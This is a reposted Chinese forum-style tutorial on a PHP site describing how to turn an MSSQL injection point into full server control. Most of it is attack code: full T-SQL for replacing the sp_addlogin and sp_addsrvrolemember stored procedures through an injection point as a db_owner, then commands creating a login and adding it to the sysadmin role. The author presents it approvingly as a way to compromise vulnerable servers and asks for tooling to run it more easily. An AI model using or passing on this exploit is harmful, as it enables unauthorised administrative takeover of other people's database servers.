文章详情

Php文档 Php问答 行业资讯 Php论坛 Php手册 Php博客
  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
关闭搜索
php爱好者> php文档>msSQL注入通杀,只要有注入点就有系统权限

msSQL注入通杀,只要有注入点就有系统权限

时间:2010-11-19  来源:fdsajhg

不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure     sp_addlogin
       @loginame     sysname
      ,@passwd            sysname = Null
      ,@defdb             ; ; sysname = 'master'         -- UNDONE: DEFAULT 

CONFIGURABLE???
      ,@deflanguage       sysname = Null
      ,@sid      varbinary(16) = Null
      ,@encryptopt     varchar(20) = Null
AS
       -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
Declare @ret       int       -- return value of sp call
    
       -- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
     raiserror(15002,-1,-1,'sp_addlogin')
     return (1)
end

       -- VALIDATE LOGIN NAME AS:
       --     (1) Valid SQL Name (SQL LOGIN)
       --     (2) No backslash (NT users only)
       --     (3) Not a reserved login name
execute @ret = sp_validname @loginame
if (@ret <> 0)
           return (1)
       if (charindex('\', @loginame) > 0)
       begin
           raiserror(15006,-1,-1,@loginame)
           return (1)
       end

--Note: different case sa is allowed.
if (@loginame = 'sa' or lower(@loginame) in ('public'))
begin
     raiserror(15405, -1 ,-1, @loginame)
     return (1)
end

       -- LOGIN NAME MUST NOT ALREADY EXIST --
if exists(select * from master.dbo.syslogins where loginname = 

@loginame)
begin
     raiserror(15025,-1,-1,@loginame)
     return (1)
end

-- VALIDATE DEFAULT DATABASE --
IF db_id(@defdb) IS NULL
begin
     raiserror(15010,-1,-1,@defdb)
        return (1)
end

-- VALIDATE DEFAULT LANGUAGE --
IF (@deflanguage IS NOT Null)
begin
     Execute @ret = sp_validlang @deflanguage
     IF (@ret <> 0)
      return (1)
end
ELSE
begin
     select @deflanguage = name from master.dbo.syslanguages
     where langid = @@default_langid --server default 

language

     if @deflanguage is null
      select @deflanguage = N'us_english'
end

-- VALIDATE SID IF GIVEN --
if ((@sid IS NOT Null) and (datalength(@sid) <> 16))
begin
     raiserror(15419,-1,-1)
      return (1)
end
else if @sid is null
     select @sid = newid()
if (suser_sname(@sid) IS NOT Null)
begin
     raiserror(15433,-1,-1)
      return (1)
end

-- VALIDATE AND USE ENCRYPTION OPTION --
declare @xstatus smallint
select @xstatus = 2 -- access
if @encryptopt is null
     select @passwd = pwdencrypt(@passwd)
else if @encryptopt = 'skip_encryption_old'
begin
     select @xstatus = @xstatus | 0x800, -- old-style 

encryption
      @passwd = convert(sysname, convert(varbinary

(30), convert(varchar(30), @passwd)))
end
else if @encryptopt <> 'skip_encryption'
begin
     raiserror(15600,-1,-1,'sp_addlogin')
     return 1
end

       -- ATTEMPT THE Insert OF THE NEW LOGIN --
Insert INTO master.dbo.sysxlogins VALUES
           (NULL, @sid, @xstatus, getdate(),
                getdate(), @loginame, convert(varbinary(256), @passwd),
                db_id(@defdb), @deflanguage)
if @@error <> 0     -- this indicates we saw duplicate row
           return (1)

-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE 

SYSLOGINS CHANGE --
exec('use master grant all to null')

       -- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
return     (0) -- sp_addlogin

GO

OK,我们新建个用户exec master..sp_addlogin xwq


再drop procedure sp_addsrvrolemember,然后在IE里输入




create procedure sp_addsrvrolemember
       @loginame sysname,      -- login name
       @rolename sysname = NULL -- server role name
as
       -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
declare @ret           int,       -- return value of sp call
                @rolebit       smallint,
                @ismem         int

       -- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
     raiserror(15002,-1,-1,'sp_addsrvrolemember')
     return (1)
end

    
       -- CANNOT CHANGE SA ROLES --
       if @loginame = 'sa'
       begin
           raiserror(15405, -1 ,-1, @loginame)
           return (1)
       end

       -- OBTAIN THE BIT FOR THIS ROLE --
       select @rolebit = CASE @rolename
                WHEN 'sysadmin'            THEN 16
                WHEN 'securityadmin'       THEN 32
                WHEN 'serveradmin'         THEN 64
                WHEN 'setupadmin'          THEN 128
                WHEN 'processadmin'        THEN 256
                WHEN 'diskadmin'           THEN 512
                WHEN 'dbcreator'           THEN 1024
      WHEN 'bulkadmin'     THEN 4096
                ELSE NULL END

       -- ADD ROW FOR NT LOGIN IF NEEDED --
if not exists(select * from master.dbo.syslogins where 

loginname = @loginame)
       begin
           execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
           if (@ret <> 0)
        begin
         raiserror(15007,-1,-1,@loginame)
         return (1)
        end
       end

       -- Update ROLE MEMBERSHIP --
       update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, 

xdate2 = getdate()
        where name = @loginame and srvid IS NULL

-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE 

SYSLOGINS CHANGE --
exec('use master grant all to null')

raiserror(15488,-1,-1,@loginame,@rolename)

       -- FINALIZATION: RETURN SUCCESS/FAILURE
return (@@error) -- sp_addsrvrolemember

GO


接着再exec master..sp_addsrvrolemember xwq,sysadmin
这样就建立了一个SA用户了,用SQL连接器连接上就OK了。很爽吧。不过在实践过程中发现用NB的SQL命令执行时会提示发送错误,可能是代码太长了的缘故,用IE又不方便,希望哪位能发个执行SQL语句的工具来方便大家。OK,到此结束
相关阅读 更多 +
排行榜 更多 +
辰域智控app

辰域智控app

系统工具 下载
网医联盟app

网医联盟app

运动健身 下载
汇丰汇选App

汇丰汇选App

金融理财 下载

Copyright 2006-2020 (phpxiu.com) All Rights Reserved.

本站为非盈利性网站,不接受任何广告。php爱好者